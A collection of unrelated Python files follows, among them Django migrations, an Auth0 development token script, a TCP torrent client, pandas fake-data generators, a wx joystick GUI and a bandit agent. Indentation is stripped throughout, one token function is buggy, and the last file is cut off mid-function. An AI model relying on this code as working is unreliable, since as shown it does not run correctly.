# Split target image into an MxN grid
def splitImage(image, size):
W, H = image.size[0], image.size[1]
m, n = size
w, h = int(W/n), int(H/m)
imgs = []
for j in range(m):
for i in range(n):
# append cropped image
imgs.append(image.crop((i*w, j*h, (i+1)*w, (j+1)*h)))
return imgs |
"""
Use this script to generate access tokens for use in development.
This requires that you configure in your .env the username and password for the OCCUR Test User
account. Reach out to Luke for help using this script.
"""
import requests
import os
import dotenv
from datetime import datetime, timedelta
dotenv.load_dotenv()
username = os.getenv("TEST_USERNAME")
password = os.getenv("TEST_PASSWORD")
r = requests.post('https://occur.us.auth0.com/oauth/token', data={
"grant_type": "password",
"client_id": "OUr5pR1GCGKp7krFCbcZ1SwkxZLwTYo8",
"audience": "occur-api",
"username": username,
"password": password,
})
# ANSI escape sequences for colorful output
set_bold_red = "\033[1m\033[91m"
set_bold_green = "\033[1m\033[92m"
set_bold_yellow = "\033[1m\033[93m"
clear = "\033[0m"
if r.ok:
data = r.json()
print(set_bold_green, "Access token:", clear, sep="", end=" ")
print(data["access_token"])
print(set_bold_yellow, f"Valid until:", clear, sep="", end=" ")
expiration = datetime.now() + timedelta(seconds=data["expires_in"])
print(expiration.strftime('%B %-d at %-I:%M %p'))
else:
print(set_bold_red, f"Something went wrong ({r.status_code}):", clear, sep="", end=" ")
if not (username and password):
print("You must configure TEST_USERNAME and TEST_PASSWORD in .env to use this script.")
else:
print(r.json()["error_description"])
def get_token():
username = os.getenv("TEST_USERNAME")
password = os.getenv("TEST_PASSWORD")
r = requests.post('https://occur.us.auth0.com/oauth/token', data={
"grant_type": "password",
"client_id": "OUr5pR1GCGKp7krFCbcZ1SwkxZLwTYo8",
"audience": "occur-api",
"username": username,
"password": password,
});
# ANSI escape sequences for colorful output
set_bold_red = "\033[1m\033[91m"
set_bold_green = "\033[1m\033[92m"
set_bold_yellow = "\033[1m\033[93m"
clear = "\033[0m"
if r.ok:
return data["access_token"]
else:
None
|
# Generated by Django 2.2.7 on 2019-11-17 17:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tssite', '0003_auto_20191117_1712'),
]
operations = [
migrations.AlterField(
model_name='teacher',
name='mname',
field=models.CharField(max_length=10, null=True),
),
]
|
from django.db import models
class InventoryTrackingUrl(models.Model):
serial_number = models.CharField(max_length=50, null=False)
model_string = models.CharField(max_length=50, null=False)
gtin_number = models.CharField(max_length=50, null=False)
base_model = models.CharField(max_length=50, null=False)
business_unit = models.CharField(max_length=50)
device_create_date = models.DateTimeField()
device_ship_date = models.DateTimeField()
create_date = models.DateTimeField(null=True)
update_date = models.DateTimeField(null=True)
proxy_url = models.CharField(max_length=100)
unique_string = models.CharField(max_length=50)
def __str__(self):
return self.gtin_number
class Meta:
verbose_name = 'InventoryTrackingUrl'
verbose_name_plural = 'InventoryTrackingUrl'
# class QrCodeURLData(models.Model):
# key = models.CharField(max_length=25, null=False)
# value = models.CharField(max_length=25, null=False)
#
# def __str__(self):
# return self.key
#
# class Meta:
# verbose_name = "QR Code Base Data"
# verbose_name_plural = "QR Code Base Data"
|
#!/usr/bin/env python
# converts a .m3u8 (Plex) => .txt (Pulsar for Android)
import sys
import os
import urllib.parse
import re
import time
filepath = sys.argv[1]
sd_card_music="/storage/3366-6437/Music"
plex_playlist_prefix="/Volumes/backup/bnixbook-music/Music"
if not os.path.isfile(filepath):
print("File path {} does not exist. Exiting...".format(filepath))
sys.exit()
fp = open(filepath)
lines = []
cnt = 0
pattern = r"^[^\#]"
for line in fp:
cnt += 1
if re.search(pattern, line) is not None:
f_line = urllib.parse.unquote(line).replace("\n", "")
f_line = f_line.replace(plex_playlist_prefix, sd_card_music)
#print("{}: {}".format(cnt, f_line))
lines.append(f_line)
fp.close()
new_filepath = filepath.replace(".m3u8", "_{}.txt".format(int(time.time())))
fo = open(new_filepath, "w")
for line in lines:
fo.write(line + "\n")
fo.close()
print("Wrote {} entries to {}".format(len(lines), new_filepath))
|
/Users/daniel/anaconda/lib/python3.6/struct.py |
def is_prime(number):
# Implement the tests onee by one here
return False
class InvalidNumberError(Exception):
pass
|
import os
from os.path import dirname, abspath
import nodebin as project
def _env(env):
"""If ENV exit but with empty value, return empty string."""
return env if os.getenv(env) else ''
def _getenv(env, default=None):
"""If ENV doesn't exist or None, return default value."""
# Note that os.getenv('') always returns None
return os.getenv(_env(env), default)
class Config:
# Settings for Flask
SECRET_KEY = _getenv('SECRET_KEY') # used for session
TESTING = False
# Pretty print JSON in API
JSONIFY_PRETTYPRINT_REGULAR = True
# Settings for Debug by Flask-DebugToolbar
DEBUG_TB_PROFILER_ENABLED = True
DEBUG_TB_INTERCEPT_REDIRECTS = False
# Settings for Database by Flask-SQLAlchemy
SQLALCHEMY_COMMIT_ON_TEARDOWN = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_ECHO = False
def __init__(self):
# Make sure PROJECT_CONFIG is set
Config._health_check()
@staticmethod
def _health_check():
project_config = '{}_CONFIG'.format(project.__name__.upper())
if not _getenv(project_config):
raise Exception(
'Environment variable {} is not set'.format(project_config)
)
class DevConfig(Config):
DEBUG = True
# Settings for Database
# If DATABASE_DEV is not available, use DATABASE_URL for Heroku support
# If DATABASE_URL is not available neither, use local sqlite database
SQLALCHEMY_DATABASE_URI = _getenv(
'DATABASE_DEV',
default=_getenv(
'DATABASE_URL',
default='sqlite:///{}_dev.sqlite3'.format(dirname(abspath(project.__file__)))
) # abspath is used for same behaviour of db migrate and run
)
class TestConfig(Config):
DEBUG = False
# Settings for Database
# If DATABASE_TEST is not available, use DATABASE_URL for Heroku support
SQLALCHEMY_DATABASE_URI = _getenv(
'DATABASE_TEST', default=_getenv('DATABASE_URL')
)
class ProdConfig(Config):
DEBUG = False
# Settings for Database
# If DATABASE_PROD is not available, use DATABASE_URL for Heroku support
SQLALCHEMY_DATABASE_URI = _getenv(
'DATABASE_PROD', default=_getenv('DATABASE_URL')
)
config = {
'dev': DevConfig,
'test': TestConfig,
'prod': ProdConfig,
}
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2016-12-25 10:52
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mygoals', '0002_auto_20161223_2032'),
]
operations = [
migrations.RenameField(
model_name='event',
old_name='datetime',
new_name='event_dt',
),
migrations.AddField(
model_name='event',
name='load_dt',
field=models.DateTimeField(default=datetime.datetime.now),
),
migrations.AddField(
model_name='goal',
name='last_plot_dt',
field=models.DateTimeField(default=datetime.datetime.now),
),
migrations.AddField(
model_name='goal',
name='plotly_url',
field=models.CharField(default='noplotlyurl', max_length=100),
preserve_default=False,
),
]
|
#!/usr/bin/env python3
# Advent of code Year 2019 Day 7 solution
# Author = seven
# Date = December 2019
import itertools
import sys
from os import path
sys.path.insert(0, path.dirname(path.dirname(path.abspath(__file__))))
from shared import vm
with open((__file__.rstrip("code.py") + "input.txt"), 'r') as input_file:
input = input_file.read()
class AmpIO(vm.IO):
def __init__(self, initial: int, phase: int):
self.was_phase_read = False
self.phase = phase
super().__init__(initial=initial)
@vm.IO.value.getter
def value(self):
if self.was_phase_read:
return super().value
self.was_phase_read = True
return self.phase
class SuspendableOutputVM(vm.VM):
def store_to_output(self, a: vm.Param):
super().store_to_output(a)
self.suspend()
max_out = None
max_phases = None
for permutation in itertools.permutations([0, 1, 2, 3, 4]):
last_out = 0
for phase in permutation:
amp = AmpIO(initial=last_out, phase=phase)
proc = SuspendableOutputVM(program=input, input=amp, output=amp)
proc.run()
last_out = proc.output.value
if max_out is None or last_out > max_out:
max_out = last_out
max_phases = '{0}'.format(permutation)
print('Max amplify at phase setting: {0}'.format(max_phases))
print('Part One: {0}'.format(max_out))
max_out = None
max_phases = None
for permutation in itertools.permutations([5, 6, 7, 8, 9]):
last_out = 0
amps = []
vms = []
for phase in permutation:
amps.append(AmpIO(initial=None, phase=phase))
amps[0].value = 0
# Create machines and hookup amps
for i in range(0, 5):
in_amp = amps[i]
out_amp = amps[0] if i == 4 else amps[i+1]
vms.append(SuspendableOutputVM(program=input, input=in_amp, output=out_amp))
last_ran_index = 0
while True:
vms[last_ran_index].resume(last_ran_index)
if vms[last_ran_index].is_halt:
break
last_ran_index = (last_ran_index + 1) % 5
last_out = vms[4].output.value
if max_out is None or last_out > max_out:
max_out = last_out
max_phases = '{0}'.format(permutation)
print('Max amplify at phase setting: {0}'.format(max_phases))
print('Part Two: {0}'.format(max_out))
|
#Inputs
ibalance = 4773
annualInterestRate = 0.20
#Initialized
month = 0
payment = 10
total = 0
#Dependents
monthlyRate = annualInterestRate/12
balance = ibalance
while balance >= 0:
#print 'Month: ' + str(month)
month += 1
print balance
balance = balance - payment
balance = balance + monthlyRate * balance
if month >= 12 and balance > 0:
payment +=10
print payment
balance = ibalance
month = 0
print 'Lowest Payment: ' + str(payment)
|
# encoding: utf-8
'''
@Version: V1.0
@Author: JE2Se
@Contact: admin@je2se.com
@Website: https://www.je2se.com
@Github: https://github.com/JE2Se/
@Time: 2020/6/10 12:22
@File: __init__.py.py
@Desc: 自加载文件
'''
from exphub.conference.ConferenceScan import ConferenceScan |
from __future__ import absolute_import
import os
from StringIO import StringIO
from tempfile import NamedTemporaryFile
import webbrowser
from peggy.peggy import Label
_HTML_TEMPLATE_FILE = "data/dot_renderer.html"
_HTML_TEMPLATE = ""
def __init():
global _HTML_TEMPLATE
path = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(path, _HTML_TEMPLATE_FILE), "r") as html:
_HTML_TEMPLATE = html.read()
class _LabelToDotConverter(object):
def __init__(self, items):
self._items = items
self._label_count = 0
self._terminal_count = 0
self._indent = 0
self._dot = StringIO()
def build_dot(self):
self._write("digraph peggy_graph {")
self._indent = 1
self._build_dot(self._items, None)
self._indent = 0
self._write("}")
def _build_dot(self, items, parent):
for item in items:
if isinstance(item, Label):
self._label_count += 1
label = "t" + str(self._label_count)
self._write(label, " [shape=box,label=", '"(',
item.label, ')"];')
if parent is not None:
self._write(parent, " -> ", label, ";")
self._build_dot(item, label)
else:
self._terminal_count += 1
label = "nt" + str(self._terminal_count)
self._write(label, " [label=", '"',
str(item).encode("string_escape"), '"];')
if parent is not None:
self._write(parent, " -> ", label, ";")
def _write(self, *elements):
self._dot.write(" " * self._indent)
for element in elements:
self._dot.write(str(element))
self._dot.write(os.linesep)
def get_dot(self):
return self._dot.getvalue()
def display(items, depth=1):
for item in items:
if isinstance(item, tuple):
display(item, depth + 1)
else:
print("{t}({i})".format(t=" " * depth, i=repr(item)))
def display_labeled(items, depth=1):
for item in items:
if isinstance(item, Label):
print("{t}({i})".format(t=" " * depth, i=item.label))
display_labeled(item, depth + 1)
else:
print("{t}{i}".format(t=" " * depth, i=item))
def render_labeled(items):
converter = _LabelToDotConverter(items)
converter.build_dot()
return _display_dot_string_in_browser(converter.get_dot())
def _display_dot_string_in_browser(dot_string):
html = _HTML_TEMPLATE.replace("##graph##", repr(dot_string))
f = NamedTemporaryFile(suffix="_peg.html", delete=False)
f.write(html)
webbrowser.open(f.name)
__init()
|
from mcvf import core, filters
print("Loading sample video...")
v = core.Video('test-video-4.mp4')
print("Filtering...")
# v.apply_filter(filters.MCGaussianFilter(block_size=20))
# v.apply_filter(filters.MCDarkenFilter(block_size=10))
# v.apply_filter(filters.MFDrawerFilter(block_size=20))
v.apply_filter(filters.MCMovingAvergeFilter(block_size=20))
print("Playing...")
v.play()
print("Saving...")
v.save_to_file("out.mp4", fps=24)
|
""" Add your Client class from your TCP assignment here """
# copy and paste your code from your client.py file
########################################################################################################################
# Class: Computer Networks
# Date: 02/03/2020
# Lab3: TCP Client Socket
# Goal: Learning Networking in Python with TCP sockets
# Student Name: John To and Chun Tat Chan
# Student ID: 917507752 and 916770782
# Student Github Username: l90320825 and chuntatchan
# Instructions: Read each problem carefully, and implement them correctly. No partial credit will be given.
########################################################################################################################
from torrent import Torrent
from message import Message
from downloader import Downloader
from file_manager import FileManager
from downloader import Downloader
import socket
import pickle
######################################## Client Socket ###############################################################3
"""
Client class that provides functionality to create a client socket is provided. Implement all the TODO parts
"""
class Client(object):
def __init__(self, peer, id, message, torrent, announce, tracker, peerid, target, host="127.0.0.1", port=12000):
"""
Class constructor
"""
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# self.serversocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.host = host
self.port = port
self.peer = peer
self.tracker = tracker
self.client_id = None
self.announce = announce
self.torrent = torrent
self.peerid = peerid
self.message = message # Send message
self.file_manager = FileManager(torrent, peerid)
self.target = target
self.id = id
def connect(self, server_ip_address, server_port):
"""
TODO: Create a connection from client to server
:param server_ip_address:
:param server_port:
:return:
"""
self.client.connect((server_ip_address, server_port))
self.set_client_id()
# data dictionary already created for you. Don't modify.
# data = {'student_name': self.student_name, 'github_username': self.github_username, 'sid': self.sid}
#print("Handshaking")
data = self.message.handshake
data['info_hash'] = self.torrent.info_hash()
data['peer_id'] = self.peerid
self.send(data)
data = self.receive()
#print("Handshaking " + str(data))
data = self.message.interested # Tell server client is interested to download
self.send(data)
data = self.receive()
#print("Interested " + str(data))
#self.send(data)
#data = self.receive()
#print(self.client.getsockname())
Downloader(self.client, self.peerid, self.torrent, 1, 1, self).run()
"""
pieceIndex = 0
while pieceIndex < 5:
for i in range(8): # Download first piece
data = self.message.request
data['index'] = pieceIndex
data['begin'] = self.torrent.block_size() * i
data['length'] = self.torrent.block_size()
self.send(data)
data = self.receive()
#print(data)
blockIndex = self.file_manager.block_index(data['begin'])
self.file_manager.flush_block(data['index'], blockIndex, data['block'])
self.message._bitfield['bitfield'][pieceIndex][blockIndex] = True
pieceIndex += 1
"""
# while True: # client is put in listening mode to retrieve data from server.
# data = self.receive()
# if not data:
# break
# print(data)
# data = self.message.interested
# do something with the data
print("Client closing")
self.peer.role = 'seeder'
print(self.peer.role)
self.close()
def send(self, data):
"""
Serializes and then sends data to server
:param data:
:return:
"""
serialized_data = pickle.dumps(data) # serialized data
self.client.send(serialized_data)
def receive(self, MAX_BUFFER_SIZE=4090):
"""
Desearializes the data received by the server
:param MAX_BUFFER_SIZE: Max allowed allocated memory for this data
:return: the deserialized data.
"""
raw_data = self.client.recv(MAX_BUFFER_SIZE) # deserializes the data from server
return pickle.loads(raw_data)
def set_client_id(self):
"""
Sets the client id assigned by the server to this client after a succesfull connection
:return:
"""
data = self.receive() # deserialized data
client_id = data['clientid'] # extracts client id from data
self.client_id = client_id # sets the client id to this client
#print("Client id " + str(self.client_id) + " assigned by server")
def close(self):
"""
TODO: close this client
:return: VOID
"""
self.client.close()
def run(self):
self.client.bind((self.host, self.port)) #connect to different pc, change to 127.0.0.1 if localhost
#self.connect("10.0.0.246", 5000)#Test
self.connect(self.target, 5000)
# self.client.bind(("", self.port))
# self.connect("172.20.176.1", 5000)
"""
def _bind(self):
# TODO: bind host and port to this server socket
:return: VOID
self.serversocket.bind((self.host, self.port))
#self.serversocket.listen(10)
while True:
message, clientAddress = self.serversocket.recvfrom(2048)
print("Client recieve")
print(clientAddress)
message = pickle.loads(message)
print(message)
entry = {'nodeID': message['nodeId'], 'ip_address': message['ip'], 'port': message['port'], 'info_hash': message['info_hash'], 'last_changed': 'timestamp' }
print(entry)
self.tracker._routing_table_add(message['info_hash'], entry)
self.connect(message['ip'], 5000)
"""
# main execution
if __name__ == '__main__':
server_ip_address = "127.0.0.1" # don't modify for this lab only
server_port = 12000 # don't modify for this lab only
# client = Client(False)
# client.connect(server_ip_address, server_port)
# How do I know if this works?
# when this client connects, the server will assign you a client id that will be printed in the client console
# Your server must print in console all your info sent by this client
# See README file for more details
|
import pygame.mixer
sounds=pygame.mixer
sounds.init()
def wait_finish(channel):
while channel.get_busy():
pass
#s=sounds.Sound("correct.wav")
#wait_finish(s.play())#wait_finish 确保当前声音播放完再播放下一个
#s2=sounds.Sound("wrong.wav")
#wait_finish(s2.play())
s3=sounds.Sound("why.wav")
wait_finish(s3.play())
#s4=sounds.Sound("carhor.wav")
#wait_finish(s4.play())
|
import pandas
import random
def main():
#city(10)
#nomer(1000)
#chelovek(10)
sadnnie_nomera(1000)
#chelovek(1000)
def city(n):
'''
df1 = pandas.read_csv('cities.csv', sep = ';')
array_people = [random.randint(10000, 10000000) for i in range(1000)]
d = {'Population': array_people}
df2 = pandas.DataFrame(data = d)
df = pandas.merge(df1, df2, left_index = True, right_index = True)
df.to_csv('out.csv', sep = ';', index = False)
#df_country.drop(['city_id'], axis = 1, inplace = True)
#df = pandas.merge(df_city, df_country, on='country_id', how='left')
myarray = []
array = random.sample(range(10969), 1000)
for i in array:
myarray.append(int(i))
array_index = []
array_countries = []
array_city = []
for i in range(len(myarray)):
array_index.append(i)
array_city.append(df['name_x'][myarray[i]])
array_countries.append(df['name_y'][myarray[i]])
d = {'City_id': array_index, 'City': array_city, 'Country': array_countries}
df = pandas.DataFrame(data = d)
df.to_csv('out.csv', sep = ';', index = False)
print(df1)
'''
countries = ['Италия','Россия', 'Германия', 'Нидерланды', 'Франция']
cities_germany = ['Мюнхен', 'Берлин', 'Франкфурт']
cities_italy = ['Милан', 'Рим', 'Флоренция']
cities_netherlands = ['Амстердам', 'Роттердам', 'Утрехт']
cities_france = ['Париж', 'Лион', 'Дижон']
cities_russia = ['Москва', 'Санкт-Петербург', 'Нижний Новгород']
array_countries = []
array_cities = []
array_people = []
array_index = []
for i in range(n):
array_countries.append(random.choice(countries))
if array_countries[i] == 'Россия':
#print("уолкпщшцкрпзхуцкшрп")
array_cities.append(random.choice(cities_russia))
if array_cities[-1] == 'Москва':
array_people.append(12500000)
elif array_cities[-1] == 'Санкт-Петербург':
array_people.append(5351935)
elif array_cities[-1] == 'Нижний Новгород':
array_people.append(1259000)
elif array_countries[i] == 'Италия':
array_cities.append(random.choice(cities_italy))
if array_cities[-1] == 'Милан':
array_people.append(1352000)
elif array_cities[-1] == 'Рим':
array_people.append(2873000)
elif array_cities[-1] == 'Флоренция':
array_people.append(382000)
elif array_countries[i] == 'Германия':
array_cities.append(random.choice(cities_germany))
if array_cities[-1] == 'Мюнхен':
array_people.append(1450000)
elif array_cities[-1] == 'Берлин':
array_people.append(3575000)
elif array_cities[-1] == 'Франкфурт':
array_people.append(736000)
elif array_countries[i] == 'Нидерланды':
array_cities.append(random.choice(cities_netherlands))
if array_cities[-1] == 'Амстердам':
array_people.append(821000)
elif array_cities[-1] == 'Роттердам':
array_people.append(623000)
elif array_cities[-1] == 'Утрехт':
array_people.append(334000)
elif array_countries[i] == 'Франция':
array_cities.append(random.choice(cities_france))
if array_cities[-1] == 'Париж':
array_people.append(2200000)
elif array_cities[-1] == 'Лион':
array_people.append(500000)
elif array_cities[-1] == 'Дижон':
array_people.append(153000)
array_index.append(i)
d = {'CityId': array_index, 'Name': array_cities, 'Countries': array_countries, 'Population': array_people}
df = pandas.DataFrame(data = d)
df.to_csv('cities.csv', sep = ';', index = False)
def nomer(n):
udobstva = ['Ванна', 'Душ']
kondei = ['Не имеется', 'В наличии']
bed = ['Объединенная', 'Разделенные']
array_udobstva = []
array_kondei = []
array_bed = []
array_number = [i for i in range(100, n + 100)]
array_index = []
for i in range(n):
array_udobstva.append(random.choice(udobstva))
array_kondei.append(random.choice(kondei))
array_bed.append(random.choice(bed))
array_index.append(i)
d = {'NomerId': array_index, 'Nomer': array_number, 'Udobstva': array_udobstva, 'Kondei': array_kondei, 'Bed': array_bed}
df = pandas.DataFrame(data = d)
df.to_csv('rooms.csv', sep = ';', index = False)
def chelovek(n):
names = ['Иван', 'Никита', 'Вася', 'Серега', 'Маша', 'Катя', 'Вера', 'Полина', 'Коля', 'Саша', 'Настя', 'Оля', 'София', 'Дима', 'Валерия', 'Елена', 'Алиса', 'Вадим', 'Илья', 'Макар', 'Радик', 'Федор', 'Цезарь', 'Чарьлз', 'Юлий', 'Мира', 'Марта', 'Одетта', 'Роза', 'Тая', 'Вероника', 'Урсула']
families = ['Коваленко', 'Левченко', 'Маркес', 'Моралес', 'Плотейко', 'Басюк', 'Фрост', 'Берник', 'Йорк', 'Беккер', 'Миллер', 'Васейко', 'Шевченко', 'Франд', 'Шнайдер', 'Мельник', 'Ткаченко', 'Юрченко', 'Боленьчук', 'Васельчук', 'Родригес', 'Фернандес', 'Гонсалес', 'Перес', 'Санчес', 'Мартинес', 'Алварес', 'Торрес', 'Флорес', 'Гарсиа', 'Кастаьо', 'Ромеро']
array_names = []
array_families = []
array_cityId = []
array_index = []
for i in range(len(names)):
for j in range(len(families)):
if len(array_names) < n:
array_names.append(names[i])
array_families.append(families[j])
m = int(n / 200)
for i in range(m):
array_index = (random.sample(range(200), 200))
for j in array_index:
array_cityId.append(int(j))
array_index = [i for i in range(n)]
d = {'PersonId': array_index, 'Name': array_names, 'Families': array_families, 'CityId': array_cityId}
df = pandas.DataFrame(data = d)
df.to_csv('person.csv', sep = ';', index = False)
def sadnnie_nomera(n):
df_room = pandas.read_csv('rooms.csv', sep = ';')
df_person = pandas.read_csv('person.csv', sep = ';')
array_days = []
array_price = []
array_personId = []
array_nomerId = []
for i in range(n):
days = random.randint(1, 30)
array_days.append(days)
array_price.append(days * 1000)
array_personId.append(random.randint(0, n - 1))
array_nomerId.append(random.randint(0, n - 1))
d = {'NomerId': array_nomerId, 'PersonId': array_personId, 'Days': array_days, 'Price': array_price}
df = pandas.DataFrame(data = d)
df.to_csv('sadnnie_nomera1.csv', sep = ';', index = False)
if __name__ == '__main__':
main()
|
import wx
import pygame
import serial.tools.list_ports
class MainFrame(wx.Frame):
def __init__(self,parent,ptitle):
wx.Frame.__init__(self,parent,title=ptitle)
self.selectedPort = None
pygame.init()
pygame.joystick.init()
self.InitUI()
def InitUI(self):
menubar = wx.MenuBar()
fileMenu = wx.Menu()
mquit = wx.MenuItem(fileMenu,101,'&Quit\tCtrl+Q','Quit the Application')
mquit.SetBitmap(wx.Image('door_exit.png',wx.BITMAP_TYPE_PNG).ConvertToBitmap())
fileMenu.Append(mquit)
fileMenu.AppendSeparator()
menubar.Append(fileMenu,'&File')
self.SetMenuBar(menubar)
self.Bind(wx.EVT_MENU, self.OnQuit,mquit)
self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)
panel = wx.Panel(self)
label = wx.StaticText(panel,label="Port: ",pos=(10,10))
ports = list(serial.tools.list_ports.comports())
self.portsbox = wx.ComboBox(panel,choices=ports,pos=(40,8))
self.connbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('conn-icon.png',wx.BITMAP_TYPE_ANY),size=(102,24),pos=(160,6.8))
self.Bind(wx.EVT_BUTTON, self.OnConn,self.connbtn)
self.disconnbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('discon-icon.png',wx.BITMAP_TYPE_ANY),size=(102,24),pos=(160,6.8))
self.disconnbtn.Hide()
self.Bind(wx.EVT_BUTTON, self.OnDisconn,self.disconnbtn)
self.newfbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('new-file.png',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(40,35))
self.openfbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('open-file.png',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(80,35))
self.recbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('record.png',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(120,35))
self.stopbtn = wx.BitmapButton(panel,bitmap=wx.Bitmap('stop.ico',wx.BITMAP_TYPE_ANY),size=(30,30),pos=(160,35))
self.Bind(wx.EVT_BUTTON, self.OnNewf, self.newfbtn)
self.Bind(wx.EVT_BUTTON, self.OnOpenf, self.openfbtn)
self.Bind(wx.EVT_BUTTON, self.DoRecordStart, self.recbtn)
self.Bind(wx.EVT_BUTTON, self.DoRecordStop, self.stopbtn)
jpanel = JoystickPanel(panel,pos=(500,10),size=(340,565))
self.SetSize((860,640))
self.Centre()
self.Show()
done = False
textPrint = TextPrint()
joystick_count=pygame.joystick.get_count()
clock = pygame.time.Clock()
textPrint.print(jpanel, "Number of joysticks: {}".format(joystick_count))
textPrint.indent()
while done==False:
for event in pygame.event.get():
if event.type==pygame.QUIT:
done=True
if event.type==pygame.JOYBUTTONDOWN:
print("Joystick button presed.")
if event.type==pygame.JOYBUTTONUP:
print("Joystick button released.")
textPrint.reset()
for i in range(joystick_count):
joystick=pygame.joystick.Joystick(i)
joystick.init()
textPrint.print(jpanel,"Joystick {}".format(i))
textPrint.indent()
name=joystick.get_name()
textPrint.print(jpanel, "Joystick name: {}".format(name))
axes=joystick.get_numaxes()
textPrint.print(jpanel, "Number of axes: {}".format(axes))
textPrint.indent()
for i in range(axes):
axis=joystick.get_axis(i)
textPrint.print(jpanel,"Axis {}value: {:>6.3f}".format(i,axis))
textPrint.unindent()
buttons=joystick.get_numbuttons()
textPrint.print(jpanel, "Number of buttons: {}".format(buttons))
textPrint.indent()
for i in range(buttons):
button=joystick.get_button(i)
textPrint.print(jpanel, "Button {:>2} value: {}".format(i,button))
textPrint.unindent()
hats=joystick.get_numhats()
textPrint.print(jpanel, "Number of hats: {}".format(hats))
textPrint.indent()
for i in range(hats):
hat=joystick.get_hat(i)
textPrint.print(jpanel, "Hat {} value: {}".format(i, str(hat)))
textPrint.unindent()
textPrint.unindent()
clock.tick(20)
def OnQuit(self,e):
pygame.event.clear()
pygame.event.post(pygame.event.Event(pygame.QUIT))
self.Close()
def OnCloseWindow(self,e):
pygame.event.clear()
pygame.event.post(pygame.event.Event(pygame.QUIT))
self.Destroy()
def OnConn(self,e):
print("disconnect:"+self.portsbox.GetStringSelection())
if(self.portsbox.GetStringSelection()!=""):
self.selectedPort = self.portsbox.GetStringSelection()
self.connbtn.Hide()
self.disconnbtn.Show()
else:
wx.MessageBox('กรุณาเลือก Port','Error',wx.OK|wx.ICON_INFORMATION)
def OnDisconn(self,e):
print("connect")
self.selectedPort = None
self.connbtn.Show()
self.disconnbtn.Hide()
def OnOpenf(self,e):
with wx.FileDialog(self, "Open recorded file", wildcard="Text files (*.txt)|*.txt",style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST) as fileDialog:
if fileDialog.ShowModal()==wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'r+') as file:
self.DoLoadFile(file)
except IOError:
wx.LogError("Cannot open file '%s'." % pathname)
def OnNewf(self,e):
with wx.FileDialog(self, "Create new file", wildcard="Text files (*.txt)|*.txt",style=wx.FD_SAVE|wx.FD_OVERWRITE_PROMPT) as fileDialog:
if fileDialog.ShowModal()==wx.ID_CANCEL:
return
pathname = fileDialog.GetPath()
try:
with open(pathname, 'w') as file:
self.DoLoadFile(file)
except IOError:
wx.LogError("Cannot save current data in file '%s'." % pathname)
def DoLoadFile(self,f):
self.logFile = f
print(self.logFile)
def DoRecordStart(self,e):
self.recFlag = True
print(self.logFile)
def DoRecordStop(self,e):
self.recFlag = False
try:
print(self.logFile)
self.logFile.close()
except:
print('No file')
class JoystickPanel(wx.Panel):
def __init__(self,parent,*args,**kwargs):
wx.Panel.__init__(self,parent,*args,**kwargs)
self.SetBackgroundColour((255,255,255))
class TextPrint:
def __init__(self):
self.reset()
def print(self, panel, textString):
wx.StaticText(panel,label=textString, pos=[self.x, self.y])
self.y += self.line_height
def reset(self):
self.x = 10
self.y = 10
self.line_height = 15
def indent(self):
self.x += 10
def unindent(self):
self.x -= 10
if __name__=='__main__':
ex = wx.App(False)
MainFrame(None,'Esan3D - Controller')
ex.MainLoop()
|
import numpy as np
from tensorboardX import SummaryWriter
from K_Armed_Testbed import K_Armed
class UCB_Agent(object):
def __init__(self, env, maxItr = 10000, c = 2):
self.env = env
self.maxItr = maxItr
self.c = c
self.avgReward = []
self.bestAction = []
def learn(self):
Q = [0 for i in range(self.env.K)]
N = [0 for i in range(self.env.K)]
self.avgReward = []
self.rightAction = []
avgReward = 0
bestAction = 0
writer = SummaryWriter(comment="KABUCB_{}".format(self.c))
for epi in range(1,self.maxItr+1):
con = (self.c**2)*np.log(epi)
arm = np.argmax(Q+np.sqrt(np.array([con])/N))
reward,isBest = self.env.step(arm)
N[arm] = N[arm]+1
Q[arm] = Q[arm]+1.0/N[arm]*(reward-Q[arm])
avgReward = avgReward + 1.0/epi*(reward-avgReward)
if isBest:
bestAction = bestAction+1
self.avgReward.append(avgReward)
self.bestAction.append(bestAction/epi*100)
if epi%int(self.maxItr/10.0) == 0:
print("%d/%d: average_reward=%.3f, best_action=%.1f" % (\
epi,self.maxItr, self.avgReward[-1], self.bestAction[-1]))
writer.add_scalar("average_reward", self.avgReward[-1],epi)
writer.add_scalar("best_action", self.bestAction[-1],epi)
print("Done: average_reward=%.3f, best_action=%.1f" % (\
self.avgReward[-1], self.bestAction[-1]))
if __name__ == "__main__":
env = K_Armed(10)
es = [0.5,1,2]
for i in es:
agent = UCB_Agent(env,c=i)
agent.learn()
|
import json
import matplotlib.pyplot as plt
import numpy as np
import sys
from constants import image_height, image_width
from img import get_img
from preprocess import get_true_mask
def show(id, img_path, true_masks):
fig = plt.figure(figsize=(10, 10))
fig.canvas.set_window_title("Deep Mask: Check mask {}".format(id))
(mask, _) = true_masks[0]
mask = mask[:, :, 0]
plt.subplot(1, 2, 1)
image = plt.imread(img_path)
image = np.array(image)
image[:, :, 0] *= mask
image[:, :, 1] *= mask
image[:, :, 2] *= mask
image = image.tolist()
plt.imshow(image)
plt.subplot(1, 2, 2)
image = plt.imread(img_path)
image = np.array(image)
image[:, :, 0] *= 1 - mask
image[:, :, 1] *= 1 - mask
image[:, :, 2] *= 1 - mask
image = image.tolist()
plt.imshow(image)
plt.show()
def show_mask(index):
with open("../data/data_classification_train.json") as json_file:
data = json.load(json_file)
if index not in data:
print("Index {} out of range".format(index))
return
img_path = "../pictures/pictures_classification_train/{}.png".format(index)
